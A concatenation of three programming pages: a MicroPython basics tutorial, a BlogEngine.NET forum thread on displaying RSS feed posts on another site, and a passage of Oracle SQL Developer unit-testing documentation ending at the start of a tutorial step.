while loops are similar to for loops; however, they allow you to run a loop until a specific conditional is true/false. In this case, the loop checks whether x is less than 9 each time it passes.

    x = 0
    while x < 9:
        x += 1
        print(x)

Functions are blocks of code that are referred to by name. Data can be passed into a function to be operated on (i.e. the parameters), and it can optionally return data (the return value). All data that is passed to a function is explicitly passed. The function below takes two numbers and adds them together, outputting the result.

    def add(number1, number2):
        return number1 + number2

    add(1, 2)  # expect a result of 3

The next function takes an input name and prints a string containing a welcome phrase.

    def welcome(name):
        welcome_phrase = "Hello, " + name + "!"
        print(welcome_phrase)

    welcome("Alex")  # expect "Hello, Alex!"

Python has a number of different data structures for storing and manipulating variables. The main difference (regarding data structures) between C and Python is that Python manages memory for you.
This means there’s no need to declare the sizes of lists, dictionaries, strings, etc.

A list is a data structure that holds an ordered collection (sequence) of items.

    networks = ['lora', 'sigfox', 'wifi', 'bluetooth', 'lte-m']
    print(networks[2])  # expect 'wifi'

A dictionary is like an address book in which you can find the address or contact details of a person by knowing only his/her name; i.e., keys (names) are associated with values (details).

    address_book = {'Alex': '2604 Crosswind Drive',
                    'Joe': '1301 Hillview Drive',
                    'Chris': '3236 Goldleaf Lane'}
    print(address_book['Alex'])  # expect '2604 Crosswind Drive'

Tuples are similar to lists but are immutable, i.e. you cannot modify tuples after instantiation.

    pycom_devices = ('wipy', 'lopy', 'sipy', 'gpy', 'fipy')
    print(pycom_devices[0])  # expect 'wipy'

For more Python examples, check out these tutorials. Be aware of the implementation differences between MicroPython and Python 3.5.
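Building on the structures above, here is a small combined example using a list, a dictionary, a function, and a loop together (the device-to-network pairing is illustrative data, not an official mapping):

```python
# Map each device name (illustrative data) to a network it supports,
# then describe each one using a function and a for loop.
devices = ['wipy', 'lopy', 'sipy']
networks = {'wipy': 'wifi', 'lopy': 'lora', 'sipy': 'sigfox'}

def describe(device):
    return device + " supports " + networks[device]

for d in devices:
    print(describe(d))
# expect:
# wipy supports wifi
# lopy supports lora
# sipy supports sigfox
```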
https://docs.pycom.io/gettingstarted/programming/examples/
I want to display the most recent blog posts or their headlines from my BlogEngine blog on my website's homepage (which isn't built using BlogEngine.NET). This link explains how to display content outside of WordPress on your website. What is the best way to display blog content on your website's homepage when using BlogEngine?

Depends on your other site. If it is ASP.NET, you might be able to directly reference BlogEngine and loop through the posts, similar to what is described in that article. If it is PHP or something else, you might need to expose your posts via a web service. As a last resort, you can always screen scrape your BE posts, which is ugly but works across any platform.

My website is ASP on IIS 6 with .NET support. I noticed that the syndication.axd output has all of the XML I need to display the most recent posts. Is there a way to read the syndication output? I would like to do something like the following (which obviously doesn't work):

    <%
    'Load XML
    set xml = Server.CreateObject("Microsoft.XMLDOM")
    xml.async = false
    xml.load(Server.MapPath("blogengine/syndication.axd"))

    'Load XSL
    set xsl = Server.CreateObject("Microsoft.XMLDOM")
    xsl.async = false
    xsl.load(Server.MapPath("blog_links.xsl"))

    'Transform file
    'Response.Write(xml.transformNode(xsl))
    %>

Thanks in advance.

There's already some code in BE that reads RSS feeds. One that comes to mind is the BlogRoll (in the App_Code\Controls\Blogroll.cs file). And if you're using ASP.NET 3.5, it includes some new built-in namespaces to consume (and publish) RSS. Here's one article demonstrating the new capabilities.

Thanks for all of your help.
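For the ASP.NET 3.5 route mentioned in the last reply, the System.ServiceModel.Syndication namespace can read an RSS/Atom feed directly. A rough C# sketch (the feed URL is a placeholder; adapt it to your blog's syndication.axd address):

```csharp
using System;
using System.ServiceModel.Syndication;
using System.Xml;

class RecentPosts
{
    static void Main()
    {
        // Placeholder URL -- point this at your blog's syndication.axd feed.
        string feedUrl = "http://example.com/blogengine/syndication.axd";
        using (XmlReader reader = XmlReader.Create(feedUrl))
        {
            SyndicationFeed feed = SyndicationFeed.Load(reader);
            foreach (SyndicationItem item in feed.Items)
            {
                // Print each post headline; render as HTML links on a real page.
                Console.WriteLine(item.Title.Text);
            }
        }
    }
}
```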
http://blogengine.codeplex.com/discussions/72488
4 SQL Developer: Unit Testing

The SQL Developer unit testing feature provides a framework for testing PL/SQL objects, such as functions and procedures, and for monitoring the results of such objects over time. You create tests, and for each you provide information about what is to be tested and what result is expected. The SQL Developer implementation of unit testing is modeled on the classic and well known xUnit collection of unit test frameworks. The unit testing feature is part of the support within the SQL Developer family of products for major parts of the life cycle of database system development, from design (provided by Data Modeler) to development to testing.

This topic contains the following topics:

- SQL Developer User Interface for Unit Testing
- Editing and Running a Unit Test
- Using a Dynamic Value Query to Create a Unit Test
- Using Lookups to Simplify Unit Test Creation
- Using Variable Substitution in Validation Actions
- Exporting and Importing Unit Test Objects
- Command-Line Interface for Unit Testing
- Unit Testing Best Practices
- Example of Unit Testing (Tutorial)

4.1 Overview of Unit Testing

The SQL Developer unit testing framework involves a set of sequential steps for each test case. The steps are as follows, including the user input before the step is run and the framework activities while the test is being run.

Identify the object to be tested.
User Input: Identify the object, such as a specific PL/SQL procedure or function.
Framework Activities: Select the object for processing.

Perform any startup processing.
User Input: Enter the PL/SQL block, or enter NULL for no startup processing.
Framework Activities: Execute the block.

Run the unit test object.
User Input: (None.)
Framework Activities: Execute the unit test.

Check and record the results.
User Input: Identify the expected return (result), plus any validation rules.
Framework Activities: Check the results, including for any validation, and store the results.
Perform any end processing (teardown).
User Input: Enter the PL/SQL block, or enter NULL for no teardown activities.
Framework Activities: Execute the block.

For each test, you enter the information called for in the preceding steps, to create a test case. A unit test is a group of test cases (one or more) on a specific PL/SQL object. Each test case is an implementation. Each unit test has at least one implementation (named Default by default); however, you can add one or more other implementations. For example, you can have implementations that test various combinations of parameter values, including those that generate exceptions. When a unit test is run, each implementation is run one after the other. Each implementation runs the startup action (if any) for the test, then the test implementation itself, and then the teardown action (if any). The difference between implementations is in the values of the calling arguments. Any dynamic value query is evaluated before the execution of all of the implementations, including before any startup action.

You can group unit tests into a test suite to be run as a grouped item, and the test suite can have its own startup and end processing in addition to any specified for test cases and unit tests.

To learn more about unit testing with SQL Developer, take whichever approach suits your preference:

- Go to Example of Unit Testing (Tutorial) and follow the steps, and then return to read the remaining conceptual information under SQL Developer: Unit Testing. Or
- Read the remaining conceptual information under SQL Developer: Unit Testing, finishing with Example of Unit Testing (Tutorial).

Related Topics

4.2 SQL Developer User Interface for Unit Testing

The SQL Developer user interface for unit testing includes the Unit Test navigator, the Unit Test submenu, and other features. Figure 4-1 shows the Unit Test navigator, which includes the top-level nodes Library, Lookups, Reports, Suites, and Tests.
(If this navigator is not visible, click View, then Unit Test.)

Figure 4-1 Unit Test Navigator

In the preceding figure, the top-level repository node shows the name of the connection being used (unit_test_repos) and whether the user associated with that connection has only User access to the repository or both Administrator and User access (here, both). The preceding figure also shows the types of actions under the Library node (Startups, Teardowns, Validations), one test suite, and several tests.

4.2.1 Unit Test Submenu

To display the Unit Test submenu, click Tools, then Unit Test. (The commands on the Unit Test submenu affect the unit test repository.)

- Select Current Repository: Enables you to select the database connection to use for the unit testing repository, and to create a repository using that connection if no repository exists in the associated schema.
- Deselect Current Repository: Disconnects from the current unit testing repository. To connect again to a unit testing repository (the same one or a different one), use Select Current Repository.
- Purge Run Results: Deletes any existing results from the running of tests and suites.
- Create/Update Repository: Enables you to create a unit testing repository, to hold schema objects associated with the SQL Developer unit testing feature.
- Drop Repository: Drops (deletes) the current unit testing repository.
- Purge Repository Objects: Deletes the contents of the current unit testing repository, but does not delete the repository metadata.
- Import From File:
- Manage Users: Enables you to select, add, and modify database connections to be used for the unit testing repository.
- Show Shared Repository:
- Select As Shared Repository: Makes the current repository a shared repository.
- Deselect As Shared Repository: Makes the current repository an unshared repository.
Related Topics

4.2.2 Other Menus: Unit Test Items

The View menu has the following item related to unit testing:

- Unit Test: Toggles the display of the Unit Test navigator.

4.2.3 Unit Test Preferences

The SQL Developer user preferences window (displayed by clicking Tools, then Preferences) contains a Unit Test Parameters pane.

Related Topics

4.3 Unit Test Repository

The unit test repository is a set of tables, views, indexes, and other schema objects that SQL Developer maintains to manage the use of the unit testing feature. (Most of these objects have UT_ in their names.) You can create a separate database user for a repository or use the schema of an existing database user; but for simplicity and convenience in an environment with a single main shared repository, you may want to create a separate database user. A repository can be unshared or shared, depending on how many and which database users are allowed to perform various types of unit testing operations:

- In an unshared repository, only the database user that owns the unit test repository schema objects can be used for operations that can modify the repository. There can be multiple unshared repositories, for example, to allow individual developers to create private repositories.
- In a shared repository, the owner of the repository objects and any other user that has been granted Administrator access to the repository (specifically, the UT_REPO_ADMINISTRATOR role) can perform administrative operations, such as managing users. There can be at most one shared repository, and this is the typical case for a team development environment.

A repository administrator can add users and can switch the repository status between shared and unshared. (When a repository is made shared, SQL Developer creates public synonyms for the appropriate repository objects.)

To change an unshared repository to shared, click Tools, then Unit Test, then Repository, then Select As Shared Repository.
To change a shared repository to unshared, click Tools, then Unit Test, then Repository, then Deselect As Shared Repository.

4.3.1 Managing Repository Users and Administrators

To create and run unit tests and suites, you must use a connection for a database user that has been granted User access to the repository (specifically, the UT_REPO_USER role). To perform repository administrative operations, such as managing users, you must use a connection for a database user that has been granted Administrator access to the repository (specifically, the UT_REPO_ADMINISTRATOR role). For example, you may want to allow users SCOTT, JONES, and SMITH to use the unit test capabilities and thus have User access to the shared repository, but to allow only SYS and the user that owns the repository objects to have Administrator access to the shared repository.

To grant either type of access to any database users, click Tools, then Unit Test, then Repository, then Manage Users. Select the database connection for the owner of the repository objects or for any other user that has been granted Administrator access to the repository. The Unit Testing: Manage Users dialog box is displayed.

Related Topics

4.4 Editing and Running a Unit Test

To edit or run a unit test, click the unit test name in the Unit Test navigator and select the desired connection for running the unit test. A pane is displayed with two tabs: Details for the unit test specification, and Results for results if you run or debug the test. Under the Details tab, the pane for the subprogram has a toolbar that includes the icons shown in the following figure.

Freeze View (the pin) keeps that pane in the SQL Developer window when you click another unit test in the Unit Test navigator; a separate tab and detail view pane are created for that other unit test. If you click the pin again, the unit test's detail view pane is available for reuse.

Refresh refreshes the display in the pane.
Debug starts execution of the first or next implementation of the unit test in debug mode, and displays the results in the Results tab.

Run starts normal execution of the unit test, and displays the results in the Results tab. (Before you click Run, you can specify the database user for the run operation by selecting a database connection on the right.)

Edit (pencil icon) enables you to edit the unit test specification. (If you cannot modify the unit test, click the Edit icon.)

Commit Changes saves any changes that you have made to the unit test.

Rollback Changes discards any unsaved changes that you have made to the unit test.

If you click the Edit icon, you can modify the Startup Process, Teardown Process, and details for each implementation. You can also specify Gather Code Coverage Statistics to have SQL Developer collect statistics related to code coverage. To view any statistics that have been gathered from unit test runs, use the Test Runs Code Coverage report. In that report, you can click a row with summary information to display detailed information in the Code Coverage Details pane.

4.5 Using a Dynamic Value Query to Create a Unit Test

As an alternative to specifying exact input data when creating a unit test, you can create a dynamic value query to use data from a table as input for the test. The query returns values from specified columns in one or more rows, and all sets of values returned are checked by any process validation that you have specified for the test. One common use of dynamic value queries is to perform "reasonableness" tests, such as checking that each salary or price resulting from a test is within a specified range. To create a test that uses dynamic value queries, create and populate the table to be used by the query, create the test by specifying the object to be tested and any startup and teardown actions, and specify a validation action (such as a query returning rows or no rows).
Note: A dynamic value query is executed before the execution of all implementations in a test, including any startup action for the test. If you must populate a table before a dynamic value query is evaluated, you can do this in the startup action for a suite that includes the test.

The following example assumes that you have done at least the following in Example of Unit Testing (Tutorial): created the EMPLOYEES table, created the AWARD_BONUS procedure, and created the unit test repository. It creates a unit test that checks to be sure that no salesperson would receive a bonus so large that his or her salary amount would be greater than 20000. Follow these steps:

Create and populate the table for the data by executing the following statements:

    CREATE TABLE award_bonus_dyn_query (emp_id NUMBER PRIMARY KEY, sales_amt NUMBER);
    INSERT INTO award_bonus_dyn_query VALUES (1001, 5000);
    INSERT INTO award_bonus_dyn_query VALUES (1002, 6000);
    INSERT INTO award_bonus_dyn_query VALUES (1003, 2000);
    commit;

Create the unit test: for the test name, enter AWARD_BONUS_DYN_QUERY (same as the name of the table that you created), and select Create with single dummy representation.

In Specify Startup, click Next to go to the next page.

In Specify Parameters, click Next to go to the next page. (For this example, do not specify the Dynamic Value Query here; instead, you will specify it in later steps.)

In Specify Validations, click Next to go to the next page.

In the Unit Test navigator, click the node for AWARD_BONUS_DYN_QUERY under Tests, to display the test in an editing window.

In the Details pane, click the pencil icon next to Dynamic Value Query, enter the following, and click OK:

    SELECT emp_id, sales_amt FROM award_bonus_dyn_query;

For Expected Result, leave the value as Success.

In Specify Validations, click the plus (+) icon and select Query returning no rows.
For the query, replace the SELECT statement in the Process Validation box with the following (any semicolon at the end of the statement is ignored):

    SELECT * FROM employees WHERE salary_amt > 20000 AND commission_pct IS NOT NULL

That is, for all salespersons (employees whose commission percentage is not null), check whether the salary resulting from the unit test run is greater than 20000. If there are no such salespersons (that is, if the query returns no rows), the result of the validation action is success.

Run the AWARD_BONUS_DYN_QUERY unit test.

4.6 Using Lookups to Simplify Unit Test Creation

A lookup is an object that contains, for one or more data types, data values that can be tested. Lookups are mainly used for the following purposes:

- Providing lists of values (dropdown lists) for Input fields.
- Automatically creating test implementations based on lookup values.

To create a lookup:

In the Unit Test navigator, right-click the Lookups node and select Add Category.

Specify the category name (for example, EMP_ID_LOOKUP).

For each data type for which you want to specify lookup values (that is, valid and invalid data values for possible testing), right-click the category name and select Add Datatype, select the data type, and use the + (plus sign) icon to add as many data values as you want.

Note that (null) is automatically included in the list of values for each data type for each lookup that you create.

For example, for the environment described in Example of Unit Testing (Tutorial), you could create lookups named EMP_ID_LOOKUP and SALES_AMT_LOOKUP. Each would have only one data type: NUMBER.
For the NUMBER data for each lookup, use the + (plus sign) icon to add each of the following values on a separate line, and click the Commit Changes icon or press F11 when you are finished entering the set of numbers for each lookup:

For EMP_ID_LOOKUP: -100, 99, 1001, 1002, 1003, 1004, 2000, 9999
For SALES_AMT_LOOKUP: -1000, 0, 1000, 2000, 5000, 6000, 10000, 99999

You can delete and rename lookup categories by using the context (right-click) menu in the Unit Test navigator. You can also delete a data type under a lookup category; however, "deleting" in this case removes any currently specified data values for that type for the lookup category, and it makes the type available for selection in the Unit Testing: Add Data Type dialog box.

4.6.1 Providing Values for Input Fields

When you are specifying Input parameters for a unit test implementation, you can click the Lookup Category control to select a lookup category. When you then click in a cell under Input, you can click the dropdown arrow to select a value from the specified lookup. (You can also enter a value other than one in the list.)

For example, if you created the EMP_ID_LOOKUP lookup category, and if you select it as the lookup category when specifying parameters, then the values -100, 99, 1001, 1002, 1003, 1004, 2000, 9999, and (null) will be in the dropdown list for the Input cell for the EMP_ID parameter. (For the SALES_AMT parameter, use the SALES_AMT_LOOKUP category.)

4.6.2 Automatically Creating Implementations

If you know that you want implementations to test certain values for a data type, you can use a lookup category to generate these implementations automatically instead of creating them all manually. To do this, use either the DEFAULT lookup category or a user-created category, specify the values for the desired data type, then specify that lookup category for the Configuration set to use for lookups preference in the Unit Test Parameters preferences.
For example, assume that for NUMBER input parameters, you always want to check for a very high positive number (such as 9999), a very low negative number (such as -9999), 1, -1, and 0 (zero). Follow these steps:

In the Unit Test navigator, expand the Lookups node. Right-click DEFAULT and select Add Datatype. In the dialog box, specify NUMBER. In the Lookups Editor for the NUMBER type, use the + (plus sign) icon to add each of the following as a separate item (new line):

9999
1.0
0
-1.0
-9999

Click the Commit Changes icon or press F11. Click Tools, then Preferences, then Unit Test Parameters, and ensure that the configuration set to use for lookups is DEFAULT (the lookup category for which you just specified the values for the NUMBER data type).

Create the unit test in the usual way: in the Unit Test navigator, right-click the Tests node and select Create Test. However, in the Specify Test Name step, select Seed/Create implementations using lookup values (that is, not "Create with single dummy representation"). For Specify Startup and Specify Teardown, specify any desired action. You cannot specify anything for Specify Parameters or Specify Validations now. An implementation (with a name in the form Test Implementation n) will automatically be created for each possible combination of input parameters of type NUMBER. For any validation actions, you must specify them later by editing each generated implementation.

4.7 Using Variable Substitution in Validation Actions

You can use variable substitution in validation actions to write dynamic validations that provide a result based on the values of input and output parameters of a procedure or function, or on the return value of a function. You can specify strings in the following format in validation actions:

For input parameters: {PARAMETER_NAME}

For example, if an input parameter is named EMP_ID:

SELECT ...
WHERE employee_id = {EMP_ID} AND ...;

For output parameters: {PARAMETER_NAME$}

For example, if an output parameter is named SALARY:

SELECT ... WHERE {SALARY$} < old_salary;

For the return value: {RETURNS$}

For example, if a function returns a numeric value:

SELECT ... WHERE {RETURNS$} > 1;

What is actually substituted is the string representation of the parameter value (for text substitution), or the underlying data value of the parameter (for bind substitution, using the syntax :PARAMETER_NAME). The following example shows both styles of substitution (text style and bind style):

DECLARE
  l_PARAM1 DATE;
  bad_date EXCEPTION;
BEGIN
  l_PARAM1 := :PARAM1;
  IF '{PARAM1}' <> TO_CHAR(l_PARAM1) THEN
    RAISE bad_date;
  END IF;
END;

As a simple example of text-style variable substitution: If P1 is a parameter of type NUMBER and has the value 2.1, the string {P1} will be replaced by the string 2.1. If P1 is a parameter of type VARCHAR2 and has the value ABC, the string '{P1}' will be replaced by the string 'ABC'. (Note the single-quotation marks around {P1} in this example.)

You can use variable substitution for all types of validation actions except Compare Tables. For the applicable validation action types, variable substitution is performed as follows: For Query Returning Row(s) and Query Returning No Row(s), substitution is performed on the SQL query. For Compare Query Results, substitution is performed on both the source and target SQL queries. For Boolean Function and User PL/SQL Code, substitution is performed on the PL/SQL block.

4.8 Unit Test Library

The unit testing library enables you to store actions that you can reuse in the definitions of multiple unit tests. These user-defined actions are displayed under the Library node in the Unit Test navigator. You can store the following kinds of actions in the library, in the following categories: dynamic value queries, startup actions, teardown actions, and validation actions. Most categories have subcategories.
For example, the Startup Actions node has subnodes for Table or Row Copy and User PL/SQL Code. You can add an entry to the library in the following ways:

Expand the Library hierarchy to display the relevant lowest-level node (such as User PL/SQL Code under Startups); right-click and select Add [action-type]; specify a name for the action; click the name of the newly created action; and complete the specification.

Use the Publish to Library option when specifying the action while you are creating a unit test: enter a name for the action and click Publish. (The action will be added under the appropriate category and subcategory in the Library display in the Unit Test navigator.)

To use an action from the library when you are creating a unit test, select it from the list under Library on the appropriate page in the Unit Testing: Create Unit Test wizard or when you are editing a unit test. When you select an action from the library, you have the following options for incorporating it into the process (startup, teardown, or validation):

Copy: Uses a copy of the action, which you can then edit (for example, to modify the WHERE clause in a User PL/SQL Code procedure). If the action is later changed in the library, it is not automatically re-copied into the process.

Subscribe: Uses the action as stored in the library. (You cannot edit the action in the process if you use the Subscribe option.) If the action is later changed in the library, the changed version is automatically used in the process.

4.9 Unit Test Reports

Several SQL Developer reports provide information about operations related to unit testing. These reports are listed in the Unit Test navigator under the Reports node.
The available reports include:

All Suite Runs
All Test Implementation Runs
All Test Runs
Suite Runs Code Coverage
Suite Test Implementation Runs
Suite Test Runs
Test Implementation Runs
Test Runs Code Coverage
User Test Runs (test runs grouped by user)

Each unit testing report contains a top pane with a summary information row for each item. To see detailed information about any item, click in its row to display the information in one or more detail panes below the summary information. For example, if you click in a summary row in the All Test Runs report, details about that test run are displayed under the Test Run Details and Most Recent Code Coverage tabs. Some reports prompt you for bind variables, where you can accept the default values to display all relevant items or enter bind variables to restrict the display.

4.10 Exporting and Importing Unit Test Objects

You can export and import unit tests, suites, and objects that are stored in the library (such as startup, validation, and teardown actions). Exporting an object causes all dependent objects to be included in the resulting XML file. For example, if you export a suite, the resulting XML file includes all tests in that suite, as well as all startup, validation, and teardown actions within each test in that suite. To export an object, right-click its name in the Unit Test navigator and select Export to File; then specify the location and name for the XML file that will include the definitions of the objects.

Importing unit test objects from an XML file causes all objects in the file to be created in the appropriate places in the Unit Test navigator hierarchy. If an object already exists in the repository with the same name as an object of the same type in the XML file, it is replaced (overwritten) by the object definition in the XML file. To import unit test objects, click Tools, then Unit Test, then Import from File; then specify the XML file to be used for the import operation.
4.11 Command-Line Interface for Unit Testing

As an alternative to using the SQL Developer graphical interface for running unit tests and suites, and exporting and importing unit test objects, you can use the command line. When running a unit test from the command-line interface, you can use the following parameters:

-db <connection name> specifies the database connection associated with the database user to be used for running the unit test.
-repo <connection name> specifies the database connection associated with the unit testing repository to be used for running the unit test.
{-log <0,1,2,3>} specifies the logging level, where: 0 = No logging (the default). 1 = Report the status. 2 = Report the status and error message. 3 = Report the status, error message, and return ID value.
{-return <return id>} specifies the return ID value, which is used as the primary key in the results table, and which will allow automation tools to query the results from the database.

The following example runs a unit test named AWARD_BONUS in a Windows environment where SQL Developer is installed under C:\. (Note that test and suite names are case sensitive for the command-line interface.) This example uses the repository connection for user unit_test_repos and runs the test as user fred.

> cd c:\sqldeveloper\sqldeveloper\bin
> sdcli unittest -run -test -name AWARD_BONUS -repo unit_test_repos -db fred

The following example exports a unit test named AWARD_BONUS. It uses the repository connection for user unit_test_repos and stores the exported definitions in the file C:\ut_xml\award_bonus_test.xml.

> sdcli unittest -exp -test -name AWARD_BONUS -repo unit_test_repos -file c:\ut_xml\award_bonus_test.xml

The following example imports object definitions from the file C:\ut_xml\award_bonus_suite.xml. It uses the repository connection for user unit_test_repos.
> sdcli unittest -imp -repo unit_test_repos -file c:\ut_xml\award_bonus_suite.xml

To check the results of any tests or suites that you run from the command line, you can start SQL Developer and view the All Test Runs and All Suite Runs reports.

4.12 Unit Testing Best Practices

This topic contains some recommendations and suggestions for using unit testing in SQL Developer:

4.12.1 Strategy

If you have many packages, analyze the system as a whole to group the packages into functional areas, and create a test suite for each functional area. This process of decomposition can be done recursively, where the ideal situation is to come up with small groups of testable objects that have a common set of argument values. With a test suite hierarchy in place, you can create tests for each object and place the tests into the hierarchy.

4.12.2 Test Suites

Tests should be organized into test suites to facilitate the bulk execution of tests. Suites can be built from other suites and tests, allowing areas of interest to be grouped together, and even a "super suite" can be created that executes all tests.

4.12.3 Test Naming

Test names are limited to 120 bytes, so test names can be up to 120 characters for a single-byte character set (significantly fewer for multibyte character sets). Tests are automatically created using the canonical name of the test object (that is, package functions and procedures will be qualified by the package name). For example, given a package named MY_PACKAGE_NAME that contains a procedure named MY_PROCEDURE_NAME and a function named MY_FUNCTION_NAME, the test names will be MY_PACKAGE_NAME.MY_PROCEDURE_NAME and MY_PACKAGE_NAME.MY_FUNCTION_NAME.

4.12.4 Avoiding Test Naming Clashes

If you try to create a test with the same name as an existing test (for example, creating a test multiple times on the same object or on an object with the same name in a different schema), then a sequential number is appended to the new test name.
This might result, for example, in the following tests:

MY_PACKAGE_NAME.MY_PROCEDURE_NAME
MY_PACKAGE_NAME.MY_PROCEDURE_NAME_1
MY_PACKAGE_NAME.MY_PROCEDURE_NAME_2

However, you may want to consider these alternatives:

If you have objects with the same name in different schemas, it is recommended that you prefix (prepend) the test name with either the physical schema name or a logical synonym. For example, in the following full test names, the last part is the same but the names start with different schema names:

USER3.MY_PACKAGE_NAME.MY_PROCEDURE_NAME
USER4.MY_PACKAGE_NAME.MY_PROCEDURE_NAME
USER5.MY_PACKAGE_NAME.MY_PROCEDURE_NAME

If there is a valid reason to add a test for the same object more than once, then it may be better to give each test a distinct name rather than use the default "sequence" approach. For example:

MY_PACKAGE_NAME.MY_PROCEDURE_NAME#LATEST
MY_PACKAGE_NAME.MY_PROCEDURE_NAME#COMPATIBLE

4.12.5 Test Implementations

When a test is created, a child Implementation of the test is also created. Each implementation forms the configuration for the execution of a test. The first implementation is named Test Implementation 1. You can create additional implementations to exercise the object with different combinations of values and environment. It is recommended that you use implementation names that reflect the test strategies. For example, instead of using the names Test Implementation 1, Test Implementation 2, and Test Implementation 3, use names like Upper Boundaries, Lower Boundaries, and Default Values.

4.12.6 Library

The library is a repository of commonly used values (but not data values, for which you should use Lookups). If you find you are entering the same values into the unit testing panels (for example, Startup Process), you can place those values in the library and reuse them in multiple places. You can take this a step further and ensure that all values are stored in the library, whether they are reused or not.
This brings more order to the test building process, and means that as the tested logic changes, it is easy to update all tests accordingly.

4.12.7 Lookups

Lookups store data type value domains organized into categories. For example, a SALES category might have a NUMBER data type with domain values of (-1, 0, 1, 1000, 1000000000). Categories can be created to group data type values at a fine grain (for example, EMPLOYEE or SET_3) or at the coarsest grain (for example, DEFAULT). A test implementation can be associated with only one lookup category, so you can choose a category to cover the values for all the implementations of a single test, in which case it is recommended that the lookup name echo the corresponding test name.

4.12.8 Test and Suite Execution

You can execute tests and test suites using the SQL Developer graphical and command-line interfaces. It may be more convenient to use the command-line interface to execute suites or a "super suite" (consisting of all tests). You could create a generator to run against the UT_TEST and UT_SUITE tables found in the repository schema (or public synonyms for a shared repository) to generate the operating system commands necessary to execute tests and suites.

4.13 Example of Unit Testing (Tutorial)

This section presents a simplified example in which you create a table and a PL/SQL procedure, create unit tests with test cases for valid and invalid input data, run the unit tests, and create and run a unit test suite. It assumes that you have a table of employee data that includes salary information, and that you need to create a procedure to award bonuses to sales representatives, whose pay consists of a base salary plus a commission-based bonus. The EMPLOYEES table includes the following columns, all of type NUMBER:

EMPLOYEE_ID: Employee identification (badge) number.
COMMISSION_PCT: Commission percentage for the employee: a decimal fraction representing the percentage of the amount of sales by the employee, to be used to compute a bonus that will be added to the employee's base salary to determine the total salary. For example, 0.2 or .2 indicates a 20 percent commission, or 0.2 times the amount of sales. Only employees in the Sales department have numeric COMMISSION_PCT values. Other employees (not "on commission") have null COMMISSION_PCT values.

SALARY: Salary amount for the employee; includes base salary plus any bonus (which will be calculated by an award_bonus procedure, to be created during this example).

Assume that these columns contain the data that is inserted by the statements in Create the EMPLOYEES Table, later in this example.

You create a procedure named AWARD_BONUS, which has two input parameters:

emp_id: The employee ID of an employee.

sales_amt: The amount of sales with which the employee is credited for the period in question. The bonus is calculated using the COMMISSION_PCT value for the specified employee, and the result is added to the SALARY value for that employee. If the COMMISSION_PCT is null for the employee, no commission or bonus can be calculated, and an exception is raised. This scenario occurs if an attempt is made to add a commission-based bonus to the salary of an employee who is not in the Sales department.

The rest of this example involves the following major steps:

4.13.1 Create the EMPLOYEES Table

This tutorial uses a table named EMPLOYEES, which must exist before you run any unit tests of the AWARD_BONUS procedure. This table contains some of the columns used in the HR.EMPLOYEES table that is included in the Oracle-supplied sample schemas, but it does not contain all of the columns, and it contains fewer rows and different data. You can create this EMPLOYEES table in an existing schema and using an existing database connection, or you can create a new schema and connection for the table.
To create and populate this table, enter the following statements in a SQL Worksheet or a SQL*Plus command window:

-- Connect as the database user that will be used to run the unit tests.
-- Then, enter the following statements:
CREATE TABLE employees
  (employee_id NUMBER PRIMARY KEY,
   commission_pct NUMBER,
   salary NUMBER);
INSERT INTO employees VALUES (1001, 0.2, 8400);
INSERT INTO employees VALUES (1002, 0.25, 6000);
INSERT INTO employees VALUES (1003, 0.3, 5000);
-- Next employee is not in the Sales department, thus is not on commission.
INSERT INTO employees VALUES (1004, null, 10000);
commit;

4.13.2 Create the AWARD_BONUS Procedure

Create the AWARD_BONUS procedure in the same schema as the EMPLOYEES table. In a SQL Worksheet using the appropriate database connection, enter the following text:

create or replace PROCEDURE award_bonus (
  emp_id NUMBER,
  sales_amt NUMBER) AS
  commission    REAL;
  comm_missing  EXCEPTION;
BEGIN
  SELECT commission_pct INTO commission
    FROM employees
    WHERE employee_id = emp_id;
  IF commission IS NULL THEN
    RAISE comm_missing;
  ELSE
    UPDATE employees
      SET salary = salary + sales_amt*commission
      WHERE employee_id = emp_id;
  END IF;
END award_bonus;
/

Click the Run Script icon (or press F5) to create the AWARD_BONUS procedure.

4.13.3 Create the Unit Testing Repository

You will need a unit testing repository in the database to hold schema objects that you create and that SQL Developer will maintain. You can create a separate database user for this repository or use the schema of an existing database user; however, to simplify your learning and any possible debugging you may need to do later, it is recommended that you use a separate schema for the unit testing repository, and the instructions in this section reflect this approach.

Create a database user (for example, UNIT_TEST_REPOS) for the unit testing repository. Using a database connection with DBA privileges, right-click Other Users in the Connections navigator and select Create User.
Specify UNIT_TEST_REPOS as the user name, and complete any other required information. For Default Tablespace, specify USERS; for Temporary Tablespace, specify TEMP. For System Privileges, enable CREATE SESSION; then click Apply, then Close.

Create a database connection for the unit testing repository user that you created, as follows. Click Tools, then Unit Test, then Manage Users. In the Select Connection dialog box, click the plus (+) icon to create a new database connection (for example, unit_test_repos) for the unit testing repository user. Click Save to save the connection, then Cancel to close the dialog box.

Create the repository in the schema of the user that you created, as follows. Click Tools, then Unit Test, then Select Current Repository. Specify the database connection (for example, unit_test_repos) for the unit testing repository user. When you see a message that no repository exists for that connection, follow the prompts to create a new repository. SQL Developer will display several prompts so it can execute commands that grant the necessary privileges to the unit test repository user. In each case, click Yes, and enter the SYS account password when prompted.

4.13.4 Create a Unit Test

To create the first unit test, use the Unit Test navigator. If this navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, right-click the Tests node and select Create Test. The Unit Testing: Create Unit Test wizard is displayed. In the remaining steps, specify AWARD_BONUS as the test name (same as the procedure name), and select Create with single dummy representation. In Specify Startup, click the plus (+) icon to add a startup action; and for the action, select Table or Row Copy, with EMPLOYEES as the source table and a name that you specify for the target (temporary) table. (The target table will be created; and if a table already exists with the name that you specify as the target table, it will be overwritten.)
In Specify Parameters, change the values in the Input column to the following:

For Parameter EMP_ID: 1001
For Parameter SALES_AMT: 5000

For Expected Result, leave the value as Success. In Specify Validations, click the plus (+) icon and select Query returning row(s). For the query, replace the SELECT statement in the Process Validation box with the following (any semicolon at the end of the statement is ignored):

SELECT * FROM employees WHERE employee_id = 1001 AND salary = 9400

That is, because employee 1001 has a 20 percent (0.2) commission and because the sales amount was specified as 5000, the bonus is 1000 (5000 * 0.2), and the new salary for this employee is 9400 (8400 base salary plus 1000 bonus). In this case, the query returns one row, and therefore the result of the validation action is success. Note that you could have instead specified the SELECT statement in this step using variable substitution, as follows:

SELECT * FROM employees WHERE employee_id = {EMP_ID} AND salary = 9400

However, in this specific example scenario, using variable substitution would provide no significant advantage.

4.13.5 Run the Unit Test

